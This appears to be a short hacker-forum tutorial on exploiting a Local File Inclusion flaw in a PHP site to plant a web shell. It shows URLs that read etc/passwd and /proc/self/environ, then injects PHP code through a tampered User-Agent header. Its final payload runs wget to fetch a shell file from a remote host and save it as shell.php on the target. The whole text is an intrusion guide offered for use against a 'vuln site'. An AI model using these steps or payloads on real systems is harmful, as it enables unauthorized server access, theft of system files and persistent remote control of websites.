Local File Inclusion Shell uploading

Local File Inclusion

Requirments

• Vuln site.
• Tamper data. - https://addons.mozilla.org/sv-se/firefox...mper-data/
• HackBar - https://addons.mozilla.org/en-us/firefox/addon/hackbar/
  

First of all, check if the site got a vulnerabillity against

Quote:etc/passwd

To do that.

Quote:http://www.site.com/index.php?filename=2

Change the number '2' to

Quote:etc/passwd

and it will look like this:

Quote:http://www.site.com/index.php?filename=etc/passwd

If it works, it will pop up some type of a code.

It will look like this

Spoiler (Click to View)

Do the same but change to 'Etc/passwd' to

Quote:/proc/self/environ

If it works and the file exist, you'll get something similar but not the same code.

Let's open temper data. To do that press F10 and do as I did here.


Now when you have temper data up, it would look similar to this.

Spoiler (Click to View)

Click the button 'Start temper' In the top left corner.


When the Tamper is done, you would see a window like this.


Change your 'User-Agent' to

Quote:<?php phpinfo();?>

Now refresh your site.

And this is how it would look like.

Spoiler (Click to View)

Now let us upload out shell.

Start up the Tamper-Data, then click star tamper and go to the 'User-Agent' again.

Type this into the 'User agent field'

Quote:<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

The site will now download your shell. You can locate the shell at website/shell.php
or
http://www.site.com/index.php?filename=shell.php

And you would locate your uploaded shell.

.